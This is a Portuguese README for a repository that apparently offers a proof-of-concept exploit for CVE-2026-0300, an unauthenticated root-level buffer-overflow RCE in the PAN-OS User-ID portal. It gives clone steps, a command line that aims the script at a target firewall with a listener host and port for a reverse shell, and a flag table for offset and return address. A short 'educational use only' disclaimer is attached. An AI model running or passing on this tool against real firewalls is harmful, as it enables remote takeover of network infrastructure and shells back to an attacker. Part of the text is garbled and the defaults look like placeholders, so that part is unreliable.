
Prova de conceito para CVE-2026-0300, um estouro de buffer crítico no Portal User-ID do PAN-OS que permite execução remota de código não autenticada com privilégios de root.
CVE-2026-0300 é uma vulnerabilidade de estouro de buffer de alta gravidade identificada no Portal de Autenticação User-ID™ (Portal Cativo) do Palo Alto Networks PAN-OS. Este repositório de pesquisa demonstra a lógica técnica da vulnerabilidade, focando especificamente em como um pacote de rede não autenticado pode levar à Execução Remota de Código (RCE) com privilégios de root.
| Recurso | Detalhes |
|---|---|
| ID CVE | CVE-2026-0300 |
| Pontuação de Gravidade | 9.3 (Crítico) |
| Tipo de Fraqueza | CWE-787: Gravação Fora dos Limites |
| Vetor de Ataque | Rede (Não autenticado) |
| Privilégios Necessários | Nenhum |
| Interação do Usuário | Nenhuma |
| Software Afetado | PAN-OS 12.1, 11.2, 11.1, 10.2 |
A vulnerabilidade ocorre quando o serviço do Portal de Autenticação User-ID falha ao validar o comprimento dos dados recebidos antes de gravá-los em um buffer de memória.
socket, struct e argparse).git clone https://github.com/p3Nt3st3r-sTAr/CVE-2026-0300-POC.git
cd CVE-2026-0300-POC
chmod +x research_poc.py
Esta ferramenta foi projetada com uma CLI (Interface de Linha de Comando) profissional.
python3 research_poc.py -t <IP_ALVO> --lhost <IP_OUVINTE> -L <PORTA_OUVINTE>
| Flag | Nome | Descrição | Padrão |
|---|---|---|---|
| -t | --target | (Obrigatório) Endereço IP de destino do firewall. | N/A |
| -p | --port | A porta que executa o Portal User-ID. | 6082 |
| -o | --offset | O comprimento em bytes para atingir o ponto de estouro de memória. | 2048 |
| -r | --ret | O endereço de retorno hexadecimal. | 0xdeadbeef |
| -l | --lhost | endereço IP do shell reverso | Seu IP |
| -L | --lport | Sua Porta de Escuta | 4444 |
SOMENTE PARA FINS EDUCACIONAIS E PESQUISA AUTORIZADA. Testes não autorizados contra sistemas que você não possui são ilegais. O autor não é responsável por qualquer uso indevido deste código de pesquisa. Use com responsabilidade para melhorar a segurança global. Desenvolvido por: https://t.me/p3Nt3st3rsTAr Data da Descoberta da Vulnerabilidade: 07 de maio de 2026